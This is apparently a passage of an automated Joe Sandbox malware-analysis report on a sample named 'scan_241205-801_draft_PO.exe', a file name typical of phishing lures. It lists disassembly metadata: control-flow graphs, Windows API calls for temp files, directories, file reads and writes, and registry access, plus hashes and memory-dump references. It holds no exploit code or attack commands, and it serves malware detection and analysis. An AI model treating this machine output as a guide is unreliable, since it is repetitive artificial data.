                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CountTick$wsprintf
                                                                                • String ID: ... %d%%
                                                                                • API String ID: 551687249-2449383134
                                                                                • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                                • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 532 405dbc-405dc8 533 405dc9-405dfd GetTickCount GetTempFileNameW 532->533 534 405e0c-405e0e 533->534 535 405dff-405e01 533->535 537 405e06-405e09 534->537 535->533 536 405e03 535->536 536->537
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\scan_241205-801_draft_PO.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6), ref: 00405DF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                • API String ID: 1716503409-1040908567
                                                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 538 401389-40138e 539 4013fa-4013fc 538->539 540 401390-4013a0 539->540 541 4013fe 539->541 540->541 543 4013a2-4013ad call 401434 540->543 542 401400-401401 541->542 546 401404-401409 543->546 547 4013af-4013b7 call 40136d 543->547 546->542 550 4013b9-4013bb 547->550 551 4013bd-4013c2 547->551 552 4013c4-4013c9 550->552 551->552 552->539 553 4013cb-4013f4 MulDiv SendMessageW 552->553 553->539
                                                                                APIs
                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                                • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 554 406671-40668b GetModuleHandleA 555 406697-4066a4 GetProcAddress 554->555 556 40668d-40668e call 406601 554->556 558 4066a8-4066aa 555->558 559 406693-406695 556->559 559->555 560 4066a6 559->560 560->558
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                  • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                  • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                                  • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2547128583-0
                                                                                • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                                • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 561 405d8d-405db9 GetFileAttributesW CreateFileW
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate
                                                                                • String ID:
                                                                                • API String ID: 415043291-0
                                                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 562 405d68-405d78 GetFileAttributesW 563 405d87-405d8a 562->563 564 405d7a-405d81 SetFileAttributesW 562->564 564->563
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(00000000,00000000,0040596D,00000000,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                                • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 565 40584b-405859 CreateDirectoryW 566 40585b-40585d 565->566 567 40585f GetLastError 565->567 568 405865 566->568 567->568
                                                                                APIs
                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1375471231-0
                                                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,00406192,007A0F00,00000000,?,?,Call,?), ref: 00406128
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2564180284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2564164164.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564194959.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2564209700.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
